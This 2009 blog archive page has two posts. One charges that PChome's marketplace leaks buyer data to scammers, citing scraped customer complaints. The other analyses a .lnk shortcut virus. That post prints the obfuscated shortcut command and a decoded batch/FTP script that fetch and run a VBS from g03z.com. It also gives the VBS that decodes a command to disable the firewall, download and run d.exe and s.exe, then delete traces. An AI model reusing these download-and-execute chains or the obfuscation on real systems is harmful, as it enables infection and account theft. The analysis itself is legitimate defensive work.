Archive for 十月, 2009

PCHome商店街與商店街的店家們,你們是詐騙集團的幫兇

十月 23rd, 2009

前陣子我才寫了一篇到底是誰賣了你的購物資料,到了今天,詐騙的事件有增無減,PCHome和PCHome的店家們完全一點反省、檢討與改進都沒有,跟以往一樣,把責任全推給消費者,今天,我要戳破他們的謊言,這一切是因為我看到了一篇關於PCHome詐騙事件的報導,PCHome如是說

個資又不是氣體,絕不會從平台外洩出去。

來自 http://www.itis.tw/node/3282

那種無所謂還當笑話看的態度真的令人火冒三丈,說真的,資訊安全很難做到百分之一百,但是最起碼基本的努力與態度是該有的,請問PCHome那是什麼鬼態度? 你們到底又做了什麼樣的努力? 明明知道一直有詐騙事件不停的在PCHome平台上發生,居然還說得出這種鬼話,PCHome商店街的店家也是,反正一律推給消費者就對了,反正要證明到底是誰把資料流出去很困難,雖然難以證明,但數據會說話,我發現有越來越多人在PCHome購物最近接到詐騙電話,所以把我之前寫的小爬蟲拿出來在今天再跑一次,我再說明一次我爬蟲的規則,他會跑過所有店家的負評列表第一頁,因為負評的數量不多,所以大部份店家的負評應該都數量很少,最新一頁就包含了幾年的負評,而負評抓完後我會用程式過濾出有』詐騙』字眼的負評,但因為有部份是出貨太慢被消費者抱怨他們是不是遇到詐騙,所以再一次經過手動過濾,以下是最新抓到的結果

負評資料

2009-07-06 05:09:32 http://store.pchome.com.tw/topoffice/HM/eval.htm?evalType=B
我本來要寫優良的!
但是很不巧…我今天接到詐騙集團的電話!
他很清楚告知我買了什麼東西,金額和數量!
當然方式還是…一樣! 又說你付的方式 變成分期付款! 不處理會被扣很多錢!
我不知道是Pchome還是貴公司的問題!
購買你家的東西…客戶資料會被洩漏光光!
請其他人要小心此情況!

2009-10-16 03:10:20 http://store.pchome.com.tw/dashop/HM/eval.htm?evalType=B
個人資料外漏。自收貨來己三次受到詐騙電騷擾。
騷擾時,對方對於單價,出貨日,品項資料非常清楚。

2009-09-03 18:54:32 http://store.pchome.com.tw/dashop/HM/eval.htm?evalType=B
我於8/26訂購商品一項,但不到一個月就接到詐騙電話,為什麼所有的訂購資料詐騙集團可取得,我在Pchomeh的線上購物或商店街亦購買了許多東西,亦在其他網站購物,唯獨在貴店出狀況,請貴店注意買方的資料勿外漏,謝謝.

2009-09-17 20:57:59 http://store.pchome.com.tw/dashop/HM/eval.htm?evalType=B
我上個月買一顆電池, 今天就接到詐騙電話, 為何對方會知道詳細交易內容? 煩請加強你們的交易資料保密, 謝謝!

2009-08-13 03:10:23 http://store.pchome.com.tw/dashop/HM/eval.htm?evalType=B
商品品質:產品質量太差太粗糙,買回來一裝,把我上千元的手把控制器整個磨損!!
洞大小根本不對,難放入更難拔出!!太可怕了!!
貪圖東西便宜,到頭來卻是當垃圾丟了!!
而且還造成原來搖控器的損壞,最後實在是虧更大!!!
今晚還莫名其妙接到廠商打來說付款有問題,錢都從我信用卡裡扣了!還有啥問題?!!
麻煩廠商下次自行先查清楚,這年頭詐騙太多,沒事別亂打給顧客說款項有問題,害我差點報警!!

2009-10-17 03:10:59 http://store.pchome.com.tw/bigwoman/HM/eval.htm?evalType=B
商品品質,網路安全不足,客戶基本資料外洩,受詐騙集團搔擾,應加強保護客戶購物安全購物

2008-05-06 22:10:52 http://store.pchome.com.tw/sunlead/HM/eval.htm?evalType=B
出貨及產品都不錯.

可是:你們把客戶的資料洩漏出去了!詐騙集團已經用這些交易資料在行騙了,

請趕快設法補救!(用02-77238585的電話)

2009-09-02 14:45:01 http://store.pchome.com.tw/yuti/HM/eval.htm?evalType=B
接獲詐騙集團電話..嚴重懷疑pchome商店街系統洩漏個人資料
往後將會慎重考慮是否繼續在pchome商店街購物

2009-08-24 03:10:28 http://store.pchome.com.tw/mandyshop/HM/eval.htm?evalType=B
客服態度不錯,但我的定安資料卻外流了,
還遇到詐騙集團,整個不開心!

2009-07-10 11:54:21 http://store.pchome.com.tw/mandyshop/HM/eval.htm?evalType=B
今天(98.08.30)PM10:04接到大陸口音女子的詐騙電話,心

2009-09-01 03:10:13 http://store.pchome.com.tw/epnet/HM/eval.htm?evalType=B
商品是不錯用!但是已經購買一個多月了.竟還會接到詐騙電話!感受很差!!這是為什麼?請給個合理的理由!!謝謝!!

2009-09-20 21:37:11 http://store.pchome.com.tw/e2861996/HM/eval.htm?evalType=B
我跟你們 買牛肉幹乾這事! 為何詐騙集團會知道? 竟然被詐騙集團利用 打電話 給我來行騙!
我想請教! 我的個資為何從你那邊流出去?
我的地址!電話 交易項目 金額 信用卡公司,…都給詐騙集團知道了!
對我的安全有很大影響!
打電話給你們 卻是推的一甘二淨!!
超級不負責任!!

2009-09-19 03:10:41 http://store.pchome.com.tw/jklife/HM/eval.htm?evalType=B
商品出現兩次失效,裝上去毫無反應。放置一段時間再裝上又可使用。
一個月內接到兩次詐騙電話,一打來就清楚說我在幾月幾號買了這項產品刷了多少錢…….
心情很差,不知道還會接到幾次…

2007-11-13 11:10:38 http://store.pchome.com.tw/abcd1119/HM/eval.htm?evalType=B
我這才發現原來我接到的那通電話也是詐騙集團打來的!!
本人在此鄭重表達對貴公司以及PChome商店街的嚴重不滿與抗議!!
我們都是基於信任貴司與PChome商店街交易平台的安全性才在此消費,
現在我們的手機以及其他個人資料全被盜取,
請問貴公司以及PChome商店街要怎麼負責與解決??!

2007-11-12 14:55:15 http://store.pchome.com.tw/abcd1119/HM/eval.htm?evalType=B
你們公司把我的交易資料外洩,害詐騙集團打來騷擾我,
他們明確說出我在何時,跟你們購買了這組電蚊拍,還問我使用狀況
接著騙我說我的交易紀錄出問題,說你們的交易平台異常,還我一次付清的方式變成分期,
要我去ATM取得交易明細表,還有上面的經辦證號與時間,才能做取消分期,
後來我去查證才知道是詐騙,

請大家要小心在這家商店購物時的資料外洩問題!!!!

2009-09-29 03:10:11 http://store.pchome.com.tw/elive/HM/eval.htm?evalType=B
上個禮拜收到詐騙集團的電話 大陸口音 說扣款有問題 要退錢給我之類的… 他們說的姓名 產品 價錢竟然都正確… 強烈懷疑你們資料有外露!! 所以給你負評

2009-10-06 09:14:46 http://store.pchome.com.tw/elive/HM/eval.htm?evalType=B
上個禮拜收到詐騙集團的電話 大陸口音 說扣款有問題 要退錢給我之類的… 他們說的姓名 產品 價錢竟然都正確… 強烈懷疑你們資料有外漏!! 所以給你負評

謝謝您的回覆~ 但我不知道要相信誰或相信哪種說法 『攔截email』 聽起來已經很扯… 所以並沒有改變我對你們評價的理由… 況且這會不會是只有你們這家跟PCHome才會發生這樣的意外呢?? 別家都不會呢? 我不知道… 我只知道 我過去在PCHome消費很多次 從來沒有過這樣的事情… 你們是第一次… 我只是針對發生在我身上的例子告訴大家跟你們交易有個資外洩的疑慮 而且確實已經發生了!! 要大家跟你們交易時三思 這就是評鑑系統的目地 就是要反應事實 請見諒

2009-10-06 20:17:22 http://store.pchome.com.tw/yi_cheng/HM/eval.htm?evalType=B
自從買了貴店家的產品,即已接到兩通「詐騙電話」!
因為是經由pchome及貴店家購買,所以請你們都要對這件事負責。
(如果不是你們負責解決問題,難道要由我們顧客解決嗎?)

2009-09-21 22:01:38 http://store.pchome.com.tw/tge505/HM/eval.htm?evalType=B
今天接到所謂客服來電,表明了解此次購物,但說到後來就成了詐騙電話,說我會被每月扣款…。我想你們系統也太差了,個資馬上外洩。

2008-01-06 23:51:55 http://store.pchome.com.tw/inenjoy/HM/eval.htm?evalType=B
該商家漠視消費者權益使客戶資料外洩導至接到詐騙電話,告知店家還回覆網路世界無孔不入.很抱歉.讓大家權益受損.只要大家小心別上當.謝謝。如果真的詐騙成功不知道該找誰,跟別的店家買比較安全。

2007-12-27 20:59:34 http://store.pchome.com.tw/inenjoy/HM/eval.htm?evalType=B
物美價廉,值得推薦
客戶資料外洩,遭詐騙集團call in,資安須加強。
2009-10-19 09:46:11 http://store.pchome.com.tw/egoton/HM/eval.htm?evalType=B
客服態度
過程中客戶資訊外洩,被詐騙集團利用,已反應店家至今尚未得到PChome Online 的任何回應,顯現經營者並不重視消費者的敷衍心態.

2009-03-19 14:23:27 http://store.pchome.com.tw/ezbon/HM/eval.htm?evalType=B
貨收到後第二天接到一通詐騙電話,被我識破後還被那女生罵髒話))&^%&*^$*&()….貴公司的客戶資料應該加強保護.

2009-08-24 03:10:24 http://store.pchome.com.tw/pc123456/HM/eval.htm?evalType=B
我今天收到詐騙電話

對方聲稱 我於貴商店購買的耳機付款有問題.
會造成連續扣款.

我想了解貴商店的資料是如何洩漏出去的?

2009-08-25 17:00:24 http://store.pchome.com.tw/pc123456/HM/eval.htm?evalType=B
我接到詐騙電話 聲稱我於貴商店購買的 『JABRA BT-530~全新遠寬公司貨~ 原廠[一對二]A2DP 抗燥音藍牙耳機BT530″ 商品,誤辦理為分期.要求我要操作 ATM.

我於兩週前通知貴商店,並請貴商店了解資料是如何外洩的.可貴商店置之不理.

貴商店漠視此一資料外洩事件的態度令人感到匪夷所思.

貴商店既然沒有誠意想改善與了解此個人資料外洩的問題.我也不會再貴商店繼續購物.以免個人資料繼續外流.

2009-10-01 03:10:15 http://store.pchome.com.tw/kimo_battery/HM/eval.htm?evalType=B
請注意帳號安全性 已下評價並非本人給出
評價等級: 優良 (2009/10/01 03:10:15)
並不會在半夜三點給評價 請注意
也有接到客服來電 告知刷卡問題有誤 還須繳11期198元的費用
請協助處理 這是詐騙吧~~~~~~~

2009-10-01 18:56:05 http://store.pchome.com.tw/kkto68/HM/eval.htm?evalType=B
我與貴司的交易資料, 不知是否有外洩, 今有一名女士, 宣稱是貴司人員, 說貴司因內部作業疏失, 把我變成長期會員, 要我重新提供刷卡資料, 以便代為取消.
請詳查是否真為貴司所為, 或為詐騙.謝謝:)
來電電話顯示為: 02-22830227

2009-10-07 18:49:45 http://store.pchome.com.tw/shuhut/HM/eval.htm?evalType=B
為什麼我向你們購買的資料會讓詐騙集團知道呢?搞什麼?為什麼其它店家不會呢?

2009-10-06 01:04:18 http://store.pchome.com.tw/shuhut/HM/eval.htm?evalType=B
將客戶資料洩漏給詐騙集團,我以後不會再跟你買東西了

2009-10-02 18:31:35 http://store.pchome.com.tw/maggie/HM/eval.htm?evalType=B
物品使用後有問題,提問請求協助快半個月了,都沒回應,售後服務極待加強.且今日收到詐騙電話,這是我有pchome購物以來第一次接到詐騙電話,貴公司的對客戶資料的保密也待加強.

2008-08-23 02:04:10 http://store.pchome.com.tw/sunpro/HM/eval.htm?evalType=B
客服態度
差勁的店家,在PC home商店街使用信用卡刷卡購物,理論上應該含稅,可是貨品收到卻沒有發票,寫email詢問,居然推說比照網拍特價,所以價格是未稅價,雖然金額不高 但是這種逃漏稅的行為令人不恥。另外網拍資料與商店街資料分不清,而且資料外洩,使買家接到詐騙集團以拍賣場的賣家的名號打來的詐騙電話,實在該好好檢討

2009-09-07 01:57:36 http://store.pchome.com.tw/photo_buy/HM/eval.htm?evalType=B
9/6約晚上8點多,一個自稱PCHOME人員說我在上述訂單重複扣款了900,之後他也連絡自稱郵局人員幫我處理這件事,我的個人資料對方完全寥落指掌,當下不疑有他操作了ATM,結果害我損失了13萬多!

以上我已經另行報警處理…
為什麼我的個人資料會外洩!?
我這筆被詐騙的損失要怎麼辦!?
你們這邊要怎麼跟我解釋!?
(以上同樣的內容也另行傳一份給PCHOME客服)

2009-10-03 18:02:32 http://store.pchome.com.tw/tw1111/HM/eval.htm?evalType=B
於 pchome 商店街買東西,隔沒多久就接到詐騙電話,金額與時間清清楚楚,
不管是誰洩漏資料,讓人感覺非常差勁,應該不會有下次購買。

2009-10-11 03:11:47 http://store.pchome.com.tw/life_store/HM/eval.htm?evalType=B
我自從收到商品之後就經常被各種大陸口音詐騙電話騷擾,
說是什麼當初匯款有問題,講一堆奇奇怪怪的理由,
甚至連身分證字號也被他們知道,
到底會員資料的安全怎麼做的?
不要告訴我這真的是那家公司打來的,
我以前買其他pchome的東西都沒事,
難得用到商店街就發生資料外洩,
還是說這家專賣泡綿且將顧客資料轉給詐騙集團?客服態

2009-10-15 22:34:26 http://store.pchome.com.tw/life_store/HM/eval.htm?evalType=B
我自從收到商品之後就經常被各種大陸口音詐騙電話騷擾,
說是什麼當初匯款有問題,講一堆奇奇怪怪的理由,
甚至連身分證字號也被他們知道,
到底會員資料的安全怎麼做的?
不要告訴我這真的是那家公司打來的,
我以前買其他pchome的東西都沒事,
難得用到商店街就發生資料外洩

2009-10-11 03:11:05 http://store.pchome.com.tw/yan0121/HM/eval.htm?evalType=B
購買東西約半個多月後即接到詐騙集團的電話,對買的物品與價格及時間點完全清晰一致;這是否意味著我的資訊被洩露出去了…………那以後還有誰敢上PChome購物.

2009-10-14 03:12:28 http://store.pchome.com.tw/justmall/HM/eval.htm?evalType=B
商品品質:踏板螺絲易鬆,要時常去重新鎖緊,請加強
近日接獲詐騙集團電話,本訂單及刷卡資料全部外洩,請pchome及晨昌健康科技行銷有限公司加強控管,必要時將報警處理。

2009-10-18 03:11:02 http://store.pchome.com.tw/stationery/HM/eval.htm?evalType=B
我對東西沒有疑問 可是拍了妳們的東西之後 一直接到詐騙電話 對我交易的金額項目一清二楚 請問為什麼?

數據會說話

PCHome和那些商家或許又會說,那都是使用者自己電腦中木馬之類的流出去的,我說,鬼扯! 請看統計出來的分佈圖

pc_home_sucks

如果說是使用者這邊流出去的,那這些全部集中在9月到10月間突然大量暴出來的詐騙事件又是怎麼回事? 你要說這些使用者都剛好中了他們的木馬,而又剛好最近在PCHome商店街買過東西嗎? 請別忘了,出現在這些負評裡的都只是冰山一角,看到一筆負評可能代表有n個人接過詐騙電話,就像你在你家看到一隻老鼠,就表示你家可能有n隻老鼠的道理是一樣的,只是不是每個人都特地留下負評,時間久了可能就忘了,因此在9月到10月間在PCHome商店街購物接到詐騙電話並且個人資料外流的數量遠遠超過這些資料所顯示的

想像一下,你是詐騙集團,中了你木馬的人近有在線上購物的機率有多少? 假設是1%好了,這表示,如果有1000人接到詐騙電話,那麼實際上中詐騙集團木馬的人就是100倍,你得讓十萬人的電腦都中你的木馬,並且從中過濾並找到最近有在線上購物的人,才有辦法拿到1000人的資料,詐騙集團大概是腦子壞去了才會這麼做,PCHome和店家們所說的,資料都是從使用者那端流出去的,根本就是胡扯!

投資成本最低,報酬率最高的就是 : 店家

如我上面所說的,詐騙集團要是蠢到投資在零散的使用者個人上,確實有可能可以拿到資料,但是投資報酬率低得可憐,大概只有像PCHome和PCHome商店街的店家們才會笨到這麼做,換做是我,當然是選擇投資抱酬率最高的那個攻擊,那投資報酬率最高的是哪一個環節呢? 答案當然是店家,基本上店家的電腦就跟使用者的一樣容易被入侵,但是比起入侵一堆使用者,只要入侵一個賣家,就能拿到一堆個資,哪個蠢蛋會選擇投資抱酬率低到不行的做法? 可悲的是他們都死不認錯,那請問這大量突然在同一個平台,同樣幾家少數店家暴發的詐騙事件又該如何解釋? 當然只有平台或店家被入侵最為何理,但比起店家,平台較難以入侵,店家的安全知識接近0,隨便寄幾封釣魚的信件他們只要有幾個上當就有用不完的資料!

結論

結論就是,PCHome商店街與商店街的店家是詐騙集團的幫凶,死不承認問題出在自己,把責任全推給消費者,然後就這樣任憑資料大量的流出去,讓消費者成為受害者,希望台灣的法律可以立法,讓這些將其它人資料流出去而使人受到損失的人或單位,也得付起一定的刑責,否則這些人都無所謂的樣子,還可以拿來說笑!!! 也不研究到底是哪裡、以什麼方式讓資料一而再,再而三的流出去

請大家告訴大家,抵制這些不負責任的平台與賣家,本文只要註明出處,歡迎轉載

5 comments »

Posted in 分享

.lnk捷徑檔病毒

十月 3rd, 2009

最近我同學跟我說她的電腦中毒了,我要她把病毒傳給我,所以我才能知道是什麼樣的病毒

跟據她傳來的檔案,很有趣的是,我在今年一月份也有收過類似的病毒信,也有寫了一篇簡單的介紹 : 病毒的花招 捷徑檔,我也有找到一篇文章是在介紹這種病毒

文章連結 : %Lnkget%

而到了現在,這樣的手法似乎有增無減,病毒的形式也有所變化,但是都有明顯的特點,信件內容都是繁體中文的,而主機、域名之類的都是來自中國大陸或台灣,在這背後有集團在運作,他的信件內容是這些

現在還在講露股溝妹ㄉ股溝妹已經落伍了~
告訴你瞎瞇叫蟑螂妹~
蟑螂妹
露後臀溝有什麼好大驚小怪ㄉ !
現在日本都已經在露前蟑螂鬚….實在有夠不雅ㄉ

而附加檔案是一個壓縮檔,裡面包著一個捷徑檔

virus_01

對於一般人而言,對這種東西沒什麼警覺性,一般人都只知道.exe之類的很危險,可是這病毒用的是.lnk,而且他又可以設定看起來相關的圖示,加上內容吸引人,各式各樣的內容都有,有的說是照片,有的說是援交妹,甚至有些說』如何防止帳號被盜』,各種聳動或是引誘使用者去點擊的內容都有,但是一但你點了,下場自然就很慘,你的帳號可能會被盜走用來賣掉或偷偷登入來幹壞事,他可能會自動寄類似』我是援交妹,提供全套服務』或是其它類似的內容給你msn或其它網站裡的所有聯絡人,而那些人開了,又會再次的把病毒散播出去,中毒的人肯定會很困擾,以下是一些研究與分析

捷徑檔內容

virus_02

捷徑檔的內容,像我在一月看到的一樣,是下載惡意程式來執行用的指令,有趣的是他還把視窗的大小以及字形設成最小來避免使用者發現,不同於一月的版本,在這次的版本中,他加了大量的替換變數,來讓指令非常難讀,除此之外,也可能是為了逃避防毒軟體的偵測

他的捷徑目標如下

%ComSpec% /c set q= t t.v&set a=z.c&set p=p.g&set h=p -s:z&set n=echo &echo %n%o ft%p%03%a%om^>z>j&echo %n%aa33^>^>z>>j&echo %n%bb33^>^>z>>j&echo %n%get%q%bs^>^>z>>j&echo %n%bye^>^>z>>j&echo ft%h%>>j&echo start t.vbs>>j&ren j s.bat&call s.bat&

經由整理後它的內容如下

echo echo o ftp.g03z.com^>z>j
echo echo aa33^>^>z>>j
echo echo bb33^>^>z>>j
echo echo get t t.vbs^>^>z>>j
echo echo bye^>^>z>>j
echo ftp -s:z>>j
echo start t.vbs>>j
ren j s.bat
call s.bat

簡單的來說,產生s.bat這個檔案並執行,而s.bat的檔案內容如下

s.bat:

echo o ftp.g03z.com>z
echo aa33>>z
echo bb33>>z
echo get t t.vbs>>z
echo bye>>z
ftp -s:z
start t.vbs

而這個s.bat又會去同一個ftp伺服器裡下載t.vbs這個檔案,然後執行

t.vbs:

sub k
for i=1 to UBound(s)
r=r&chr(s(i)-678)
next
Set kk = CreateObject(『Wscript.Shell』)
kk.run r,1
end sub
s=array(691,777,787,778,710,725,777,710,788,779,794,710,793,794,789,790,710,793,782,775,792,779,778,775,777,777,779,793,793,716,779,777,782,789,710,789,710,797,797,797,724,781,726,729,800,724,777,789,787,740,783,724,783,716,779,777,782,789,710,775,775,729,729,740,740,783,724,783,716,779,777,782,789,710,776,776,729,729,740,740,783,724,783,716,779,777,782,789,710,792,779,777,796,710,778,710,778,724,779,798,779,740,740,783,724,783,716,779,777,782,789,710,776,799,779,740,740,783,724,783,716,780,794,790,710,723,793,736,783,724,783,716,778,779,786,710,783,724,783,716,778,724,779,798,779,716,779,777,782,789,710,789,710,797,797,797,724,781,726,729,800,724,777,789,787,740,795,724,795,716,779,777,782,789,710,775,775,729,729,740,740,795,724,795,716,779,777,782,789,710,776,776,729,729,740,740,795,724,795,716,779,777,782,789,710,781,779,794,710,793,710,793,724,779,798,779,740,740,795,724,795,716,779,777,782,789,710,776,799,779,740,740,795,724,795,716,780,794,790,710,723,793,736,795,724,795,716,793,724,779,798,779,716,778,779,786,710,795,724,795,716,778,779,786,710,741,724,796,776,793,716,778,779,786,710,793,724,779,798,779,710,778,724,779,798,779,716,793,794,775,792,794,710,782,794,794,790,736,725,725,776,795,799,724,799,775,782,789,789,724,777,789,787,724,794,797,725,716,778,779,786,710,741,710,741,724,776,775,794)
k

它把要執行的指定ascii加過了678放在陣列s中,然後用vbs將指令還原就變成了這樣:

cmd /c net stop sharedaccess&echo o www.g03z.com>i.i&echo aa33>>i.i&echo bb33>>i.i&echo recv d d.exe>>i.i&echo bye>>i.i&ftp -s:i.i&del i.i&d.exe&echo o www.g03z.com>u.u&echo aa33>>u.u&echo bb33>>u.u&echo get s s.exe>>u.u&echo bye>>u.u&ftp -s:u.u&s.exe&del u.u&del ?.vbs&del s.exe d.exe&start http://buy.yahoo.com.tw/&del ? ?.bat

經整理過後

net stop sharedaccess
echo o www.g03z.com>i.i
echo aa33>>i.i
echo bb33>>i.i
echo recv d d.exe>>i.i
echo bye>>i.i
ftp -s:i.i
del i.i
d.exe

echo o www.g03z.com>u.u
echo aa33>>u.u
echo bb33>>u.u
echo get s s.exe>>u.u
echo bye>>u.u
ftp -s:u.u
s.exe

del u.u
del ?.vbs
del s.exe d.exe
start http://buy.yahoo.com.tw/
del ? ?.bat

經過了這又臭又長的繞這麼一大圈,在這次下載了d.exe和s.exe才是真正的病毒,兩個檔案並執行,然後刪除之前下載的所有東西,為什麼需要兩個檔案,這點我還沒有研究,接著它會開啟Yahoo! 奇摩拍賣的首頁,我猜他是想讓使用者輸入帳號密碼登入Yahoo!奇摩拍賣,然後先前裝好的病毒在一旁側錄帳號密碼,合理地懷疑,這病毒的目的可能是想偷Yahoo!奇摩拍賣的帳號,然後賣給詐騙集團,又或著這背後的集團本身就是詐騙集團,但也有可能只是想混淆視聽而已

之所以要繞這麼大一圈,我想其目的可能是想避免被研究,而最有趣的地方在於,他們都一直登入一個FTP主機,我們就來研究看看這到底是哪裡來的主機

來源的研究

註冊商 WHOIS 主機 : whois.paycenter.com.cn

The Data in Paycenter’s WHOIS database is provided by Paycenter
for information purposes, and to assist persons in obtaining
information about or related to a domain name registration record.
Paycenter does not guarantee its accuracy. By submitting
a WHOIS query, you agree that you will use this Data only
for lawful purposes and that,
under no circumstances will you use this Data to:
(1) allow, enable, or otherwise support the transmission
of mass unsolicited, commercial advertising or solicitations
via e-mail (spam); or
(2) enable high volume, automated, electronic processes that
apply to Paycenter or its systems.
Paycenter reserves the right to modify these terms at any time.
By submitting this query, you agree to abide by this policy.

Domain Name : g03z.com
PunnyCode : g03z.com
Creation Date : 2009-01-08 16:50:39
Updated Date : 2009-01-08 16:50:39
Expiration Date : 2010-01-08 16:50:21

Registrant:
Organization : ggg zzz
Name : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234

Administrative Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86–02586883333
Fax : 86–02586883333
Email : web (a) zgsj.com

Technical Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86–02586883333
Fax : 86–02586883333
Email : web (a) zgsj.com

Billing Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86–02586883333
Fax : 86–02586883333
Email : web (a) zgsj.com

能得到的就只有是中國註冊的訊息,所有聯絡資料都是亂打的,當然要註冊網域來幹壞事應該沒有人蠢到會寫自己的聯絡資料上去,接著是主機的位置,解析後是

202.153.172.43

經由whois的資料可以發現,是台灣公司的主機

inetnum: 202.153.160.0 – 202.153.207.255
netname: UNIGATENET
descr: UnigateNet, Internet Service Provider,
descr: Taipei, Taiwan, R.O.C
country: TW
admin-c: FC159-AP
tech-c: CG195-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-TW-UNIGATE
remarks: This object can only be modified by APNIC hostmaster
remarks: If you wish to modify this object details please
remarks: send email to hostmaster (at) apnic.net with your organisation
remarks: account name in the subject line.
status: ALLOCATED PORTABLE
changed: hm-changed (at) apnic.net 20031024
changed: hm-changed (at) apnic.net 20060117
source: APNIC

person: Felix Chou
address: Chief Telecom Inc.
address: No.250, Yuang Guang St.,
address: Neihu Chiu, Taipei 114,
address: Taiwan, R.O.C.
country: TW
phone: +886-2-2657-6688
fax-no: +886-2-2797-2998
e-mail: felix (at) chief.com.tw
nic-hdl: FC159-AP
mnt-by: MAINT-TW-UNIGATE
changed: noah (at) chief.com.tw 20020715
changed: mark_lin (at) chief.com.tw 20060127
source: APNIC

person: Chief Group
address: UniGate Telecom Inc.
address: No.250, Yuang Guang St.,
address: Neihu Chiu, Taipei 114,
address: Taiwan, R.O.C.
country: TW
phone: +886-2-2657-6688
fax-no: +886-2-2657-6460
nic-hdl: CG195-AP
e-mail: felix_chou (at) chief.com.tw
e-mail: mark_lin (at) chief.com.tw
e-mail: apnic_admin (at) chief.com.tw
changed: mark_lin (at) chief.com.tw 20070521
mnt-by: MAINT-TW-UNIGATE
source: APNIC

看起來是一家叫是方電訊的公司,他有提供IDC的服務,另一個公司叫領航電信,不太清楚他們之間是什麼關係,不過看起來應該是被入侵的,直接連到http://202.55.242.9/也是領航電信的網頁,應該沒有笨蛋會拿自己的公司主機來幹壞事,諷刺的是,是方電訊的首頁擺了什麼資安碉堡防護系列的產品,而領航電信的網頁,下面有排跑馬燈這樣寫著

間碟軟體對電腦使用者之危害及影響宣導:為防止不肖人士利用間碟軟體竊取格人資料, 請網際網路接取用戶注意間碟軟體對於電腦使用的危害及影響.

嘖嘖,一個被入侵了還在賣資安產品,一個還提醒別人間諜軟體的危害,都不知道自己變成了幫兇….,我有找到其它提到這些資料的討論,他們說都已經回報了這些公司,不過到了今天一樣還在幫忙散播病毒,真不知道這些公司到底在幹什麼的,開著主機讓人散播病毒

最後

我相信在這背後的集團肯定跟詐騙集團有關係,這些.lnk病毒的風格和行為都大同小異,都同樣會透過信件以誘人開啟的內容散播,而且都是以盈利目的,其目的都是為了盜取遊戲的帳號密碼,或是盜取網拍帳密,偷走網拍資料,來供詐騙集團有訂單等資料讓受害者取信

我有想過如何不讓這種事情發生,例如試著攻擊那些提供病毒檔讓人下載的主機,讓他沒有辦法運作,但是安全性是0分的機器何其多,而像上文列出這些公司,不負責任把自己伺服器安全弄好的公司也很多,即使某個伺服器的服務被我阻斷了,在這背後的集團只要換一個伺服器就可以繼續犯案,而指望台灣或是中國大陸能逮到這些人大概也遙遙無期,中國大陸可是網路犯罪的天堂,所以最好的方法還是使用者要知道這些基本的知識,這是所有使用者的責任,為了你點開了病毒把病毒散播出去,可能某個人就因此這輩子的積蓄就此被騙光,你也是幫兇之一,因此,在這個騙子橫行的年代,要有基本的警覺,接著我會寫一篇文章來告訴大家一些基本該知道的知識

7 comments »

Posted in 病毒

Tags: